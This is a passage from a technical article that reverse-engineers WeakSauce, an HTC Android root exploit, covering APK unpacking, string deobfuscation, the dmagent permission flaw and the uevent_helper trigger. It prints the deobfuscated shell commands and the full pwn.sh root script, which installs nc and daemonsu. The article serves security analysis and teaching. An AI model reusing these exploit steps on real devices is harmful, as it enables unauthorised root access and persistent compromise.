the similarly named class on the phone. Step II': dex2jar Since imgtool is not out yet at the time I'm writing this (it will be released with the book), you can use the dex2jar tool to unpack the classes. This is a simple, yet powerful utility, which undoes the work performed by the SDK's dx. Whereas the latter takes the Java classes of the APK, in JAR form, and creates a classes.dex, the former converts the classes.dex back into a JAR file. The usage is straightforward. Unpacking, you should get a classes-dex2jar.jar file, which you can unzip. morpheus@Ergo (~/tmp)$ unzip -l classes-dex2jar.jar Archive: classes-dex2jar.jar Length Date Time Name -------- ---- ---- ---- 0 05-15-14 15:54 android/ 0 05-15-14 15:54 android/support/ 0 05-15-14 15:54 android/support/v4/ # .. miscellaneous android/support/v4 classes that are totally irrelevant ... 0 05-15-14 15:54 com/ 0 05-15-14 15:54 com/cunninglogic/ 0 05-15-14 15:54 com/cunninglogic/weaksauce/ 236 05-15-14 15:54 com/cunninglogic/weaksauce/D.class 281 05-15-14 15:54 com/cunninglogic/weaksauce/G.class 306 05-15-14 15:54 com/cunninglogic/weaksauce/H.class 159 05-15-14 15:54 com/cunninglogic/weaksauce/J.class 755 05-15-14 15:54 com/cunninglogic/weaksauce/K.class 281 05-15-14 15:54 com/cunninglogic/weaksauce/M.class 3203 05-15-14 15:54 com/cunninglogic/weaksauce/MainActivity.class 674 05-15-14 15:54 com/cunninglogic/weaksauce/OnBootReceiver.class 8512 05-15-14 15:54 com/cunninglogic/weaksauce/Weak.class 331 05-15-14 15:54 com/cunninglogic/weaksauce/b.class 653 05-15-14 15:54 com/cunninglogic/weaksauce/c.class 281 05-15-14 15:54 com/cunninglogic/weaksauce/f.class 1194 05-15-14 15:54 com/cunninglogic/weaksauce/i.class 281 05-15-14 15:54 com/cunninglogic/weaksauce/j.class 306 05-15-14 15:54 com/cunninglogic/weaksauce/k.class 0 05-15-14 15:54 com/htc/ 0 05-15-14 15:54 com/htc/engine/ 0 05-15-14 15:54 com/htc/engine/system/ 1249 05-15-14 15:54 com/htc/engine/system/SystemAccess.class # .. miscellaneous android/support/v4 classes that are totally irrelevant ... 540 05-15-14 15:55 android/support/v4/view/ViewCompat$KitKatViewCompatImpl.class -------- ------- 849028 550 files Step III: Deobfuscation The classes extracted from the APK are obfuscated, but it's a simple enough matter to deobfuscate them. Looking at the SystemAccess as an example, we see: System.load(i.m("JR\033C\007]\026TTo'\003\003O\007E\017\035\000A\b`2[\024U\026U\000UKU\n")); Which implies the strings (in this case, presumably the name of a native library) are also obfuscated. The implementation of i.m shows: package com.cunninglogic.weaksauce; public final class i { public static String m(String paramString) { StackTraceElement localStackTraceElement = new java.lang.Exception().getStackTrace()[1]; String str = localStackTraceElement.getMethodName() + localStackTraceElement.getClassName(); .. The i.m method relies on its caller - obtained through the stack trace - as a key to the obfuscation. With that in mind, it's simple to create an m2, which also gets the class and method names as arguments. That is: public static String m2(String paramString, String MethodName, String ClassName) { StackTraceElement localStackTraceElement = new java.lang.Exception().getStackTrace()[1]; String str = localStackTraceElement.getMethodName() + localStackTraceElement.getClassName(); // Override: str = MethodName + ClassName; // and we can now call this function instead of the old m, // e.g. SystemAccess.m2("\000ZP\\\026\001v2KFC\004TXOD", // "com.cunninglogic.weaksauce.Weak", // "m"); So, after a little bit of search and replace we can reveal that the above string is really: "system/lib/libdm-systemaccess.so". It turns out there is a similarly named m method in SystemClass.java, used extensively by the Weak class (which performs the bulk of the work). This method obfuscates by taking using the classname, and then the method name (that is, in reverse). Deobfuscating all of the strings used in Weak class yields: data/data/com.cunninglogic.weaksauce/temp/xbin.img system/bin/chmod 755 /data/data/com.cunninglogic.weaksauce/temp/pwn.sh /system/bin/chmod 755 /data/data/com.cunninglogic.weaksauce/temp/busybox system/bin/echo 1 > /data/data/com.cunninglogic.weaksauce/temp/one /system/bin/chmod 770 /data/data/com.cunninglogic.weaksauce/temp/one ... /system/bin/sync echo '/data/data/com.cunninglogic.weaksauce/temp/pwn.sh' > /sys/kernel/uevent_helper /system/bin/sync /system/bin/chmod 770 /data/data/com.cunninglogic.weaksauce/temp /system/bin/sync /data/data/com.cunninglogic.weaksauce/temp /system/bin/echo 1 > /data/data/com.cunninglogic.weaksauce/temp/onboot data/data/com.cunninglogic.weaksauce/temp/pwn.sh So - what do we have? A lot of shell commands. Root access is somehow obtained, then these commands are run. Of particular interest is data/data/com.cunninglogic.weaksauce/temp/pwn.sh, which looks like the "pwn script". Note (in the above echo command) it gets written to /sys/kernel/uevent_helper, which is expected to contain the name of a binary launched by the kernel on device addition. This file is writable only by root, however, so the exploit must be doing something before writing to it. Indeed, looking at the device post-exploitation, we see: root@htc_m8wl:/data/data/com.cunninglogic.weaksauce/temp # ls -l /sys/kernel/ .. -rwxrwx--- u0_a235 u0_a235 4096 2014-05-16 14:21 uevent_helper -r--r--r-- root root 4096 2014-05-16 14:30 uevent_seqnum .. Showing that /sys/kernel/uevent_helper has been chown'ed to be WeakSauce's. Since the root exploit works and we have access to all the directories, we can just navigate to WeakSauce's directory, and see: root@htc_m8wl:/data/data/com.cunninglogic.weaksauce/temp # cat pwn.sh #!/system/bin/sh echo 1 > /sys/kernel/uevent_helper /system/bin/cat /system/xbin/dexdump > /data/data/com.cunninglogic.weaksauce/temp/dexdump /system/bin/cat /system/xbin/nc > /data/data/com.cunninglogic.weaksauce/temp/nc /system/bin/cat /system/xbin/dexus > /data/data/com.cunninglogic.weaksauce/temp/dexus /system/bin/chmod 744 /data/data/com.cunninglogic.weaksauce/temp//nc /system/bin/chmod 755 /data/data/com.cunninglogic.weaksauce/temp/dexus /system/bin/chmod 755 /data/data/com.cunninglogic.weaksauce/temp/dexdump /data/data/com.cunninglogic.weaksauce/temp/busybox mount /data/data/com.cunninglogic.weaksauce/temp/xbin.img /system/xbin /system/bin/sync /system/bin/cat /data/data/com.cunninglogic.weaksauce/temp/nc > /system/xbin/nc /system/bin/cat /data/data/com.cunninglogic.weaksauce/temp/dexus > /system/xbin/dexus /system/bin/cat /data/data/com.cunninglogic.weaksauce/temp/dexdump > /system/xbin/dexdump /system/bin/chmod 744 /system/xbin/nc /system/bin/chmod 755 /system/xbin/dexus /system/bin/chmod 755 /system/xbin/dexdump /system/bin/chown 0.2000 /system/xbin/nc /system/bin/chown 0.2000 /system/xbin/dexus /system/bin/chown 0.2000 /system/xbin/dexdump /system/xbin/daemonsu --auto-daemon & So all that would be needed is to get the kernel to detect a new device. This is why Weaksauce required bluetooth permissions - looking at the Weak class we see: SystemAccess.m().CopyFileCtl( SystemAccess.m("\002DGWD\004IDWN\006\001\013V\023JZCENOXUBLP\\\001^LN\t\027zhJJ\002_BLQ\b"), SystemAccess.m("NOB"), SystemAccess.m("M\027bn\006DHYIDM\b"), SystemAccess.m("Z\007\022~s]pENKQDU")); // /system/bin/sync m(SystemAccess.m("\000ZP\\\026\001v2KFC\004TXOD")); //m ("echo '/data/data/com.cunninglogic.weaksauce/temp/pwn.sh' > /sys/kernel/uevent_helper"); m(SystemAccess.m("HHQP\017\016\006K\003\020z2MNYJ\bBNJ\001JVKON\f\003CF^VA\nUADHQE^......")); // /system/bin/sync m(SystemAccess.m("\000ZP\\\026\001v2KFC\004TXOD")); // ... localBluetoothAdapter = BluetoothAdapter.getDefaultAdapter(); bool1 = localBluetoothAdapter.isEnabled(); if (!bool1) { localBluetoothAdapter.enable(); } The call to CopyFileCtl is the important one here - this was defined as a native method of the replaced com.htc.engine.system.SystemAccess class. As it so happens, this does, in fact, turn out to be a JNI library, with the corresponding method defines as: [morpheus@Forge ~]$ /usr/local/android-ndk-r8e/toolchains/arm-linux-androideabi-4.7/prebuilt/\ linux-x86_64/bin/arm-linux-androideabi-objdump -d libdm-systemaccess.so ... 00001d60 <Java_com_htc_engine_system_SystemAccess_CopyFileCtl>: .. The fault lies in this function, which calls HTC's dmagent (thorugh the /dev/socket/dmsocket socket). The daemon (running as root, naturally) performs the copying, but along the way the file permissions get incorrectly chmod'ed. Game over. Summary This article detailed how WeakSauce works. To recap: WeakSauce creates a replacement class for HTC's SystemAccess. Using JNI, it triggers a file copy operation, passing /sys/kernel as one of its arguments The dmagent daemon happily complies, and chowns the permissions on /sys/kernel/uevent_helper WeakSauce readily exploits this by writing its pwn.sh as the uevent handler WeakSauce disables/enables BlueTooth, which makes the kernel trigger the uevent_helper - that is, pwn.sh From this point on, it's all downhill - DaemonSu is installed, which is required in KitKat since a simple setuid /system/xbin/su wouldn't work - The SELinux context would confine even a root owned process to be u:r:shell:s0 (This is explained in Chapter 21, which deals with security). This way, when you type "su", you're actually going to a daemonsu, which runs as u:r:kernel:s0, and spawns you an unrestricted tmp-mksh. You can see that with ps -Z: # # Show all processes, filter out kernel threads, but still show u:r:kernel:s0 context: # root@htc_m8wl:/# ps -Z | grep -v " 2 " | grep kernel u:r:kernel:s0 root 3113 1 daemonsu:mount:master u:r:kernel:s0 root 3114 3113 daemonsu:master u:r:kernel:s0 root 5449 3114 daemonsu:10236 u:r:kernel:s0 root 6559 3114 daemonsu:0 u:r:kernel:s0 root 6567 6559 daemonsu:0:6556 u:r:kernel:s0 root 6569 6567 daemonsu u:r:kernel:s0 root 6572 6567 tmp-mksh u:r:kernel:s0 root 7521 6572 ps u:r:kernel:s0 root 7522 6572 grep u:r:kernel:s0 root 7523 6572 grep # # Note the adb spawned shell is the parent of su, which is why they're both still # u:r:shell:s0.. root@htc_m8wl:/# ps -Z | grep 6530 u:r:shell:s0 shell 6530 3618 /system/bin/sh u:r:shell:s0 shell 6556 6530 su .. And that's all. If you haven't yet checked out the book, please do so now, and feel free to drop me a line at j@ (this domain) for any questions, comments, or requests. Greets jcase and beaups - Great work, you guys. HTC owes you another customer (for now, at least) Sursa: http://www.newandroidbook.com/Articles/HTC.html